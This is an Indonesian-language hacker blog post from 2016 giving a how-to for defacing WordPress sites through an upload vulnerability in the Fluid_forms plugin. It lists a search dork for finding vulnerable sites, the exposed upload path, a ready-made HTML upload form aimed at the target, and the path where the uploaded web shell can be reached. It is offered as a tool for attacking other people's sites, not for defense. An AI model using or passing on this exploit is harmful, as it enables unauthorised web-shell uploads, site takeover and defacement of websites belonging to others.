Header Ads

Home > Exploit > Defece Menggunakan WordPress deface Fluid_forms Upload Vulnerability Exploit

Defece Menggunakan WordPress deface Fluid_forms Upload Vulnerability Exploit

Saturday, August 27, 2016



Hallo Guys , ketemu lagi dengan gua Syncr0niz3, kalo ini gua akan share
 Cara Defece Menggunakan WordPress deface Fluid_forms Upload Vulnerability Exploit

Aja sue-sue , langsung bae

#Type: CSRF & Xampp, Uploadify
#Tested: Windows XP, 7, 8, BackBox
#CMS: WordPress

Dork: inurl:fluid_forms or inurl:"/wp-content/plugins/fluid_forms/file-upload/"

Exploit: /wp-content/plugins/fluid_forms/ file upload/server/php/

CSRF , simpan dengan ext .html ya


<form method="POST" action="http://www.site.com/wp-content/plugins/fluid_forms/file-upload/server/php/"enctype="multipart/form-data"><input type="file" name="files[]" /><button>Upload</button><br/></form>

kalau vuln nanti akan keluar [] 

Akses shelmu : /wp-content/plugins/fluid_forms/file-upload/server/php/files/shellmu.php


Semoga bermanfaat

 @CowoKerensTeam

Post a Comment

No comments

Silahkan Komentar dengan bahasa yang sopan

Subscribe to: Post Comments ( Atom )
Powered by Blogger.